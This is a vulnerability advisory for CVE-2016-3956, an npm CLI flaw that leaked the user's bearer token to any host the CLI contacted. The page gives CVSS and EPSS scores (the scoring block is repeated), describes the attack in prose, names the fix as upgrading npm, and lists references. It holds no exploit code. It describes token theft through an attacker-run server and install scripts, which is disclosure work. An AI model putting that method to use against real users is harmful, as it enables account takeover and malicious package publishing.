5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.002 Low
EPSS
Percentile
61.9%
Affected versions of the npm
package include the bearer token of the logged in user in every request made by the CLI, even if the request is not directed towards the user’s active registry.
An attacker could create an HTTP server to collect tokens, and by various means including but not limited to install scripts, cause the npm CLI to make a request to that server, which would compromise the user’s token.
This compromised token could be used to do anything that the user could do, including publishing new packages.
npm install npm@latest -g
blog.npmjs.org/post/142036323955/fixing-a-bearer-token-vulnerability
www-01.ibm.com/support/docview.wss?uid=swg21980827
github.com/advisories/GHSA-m5h6-hr3q-22h5
github.com/npm/npm/commit/f67ecad59e99a03e5aad8e93cd1a086ae087cb29
github.com/npm/npm/commit/fea8cc92cee02c720b58f95f14d315507ccad401
github.com/npm/npm/issues/8380
nodejs.org/en/blog/vulnerability/npm-tokens-leak-march-2016/
nvd.nist.gov/vuln/detail/CVE-2016-3956
www.npmjs.com/advisories/98
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.002 Low
EPSS
Percentile
61.9%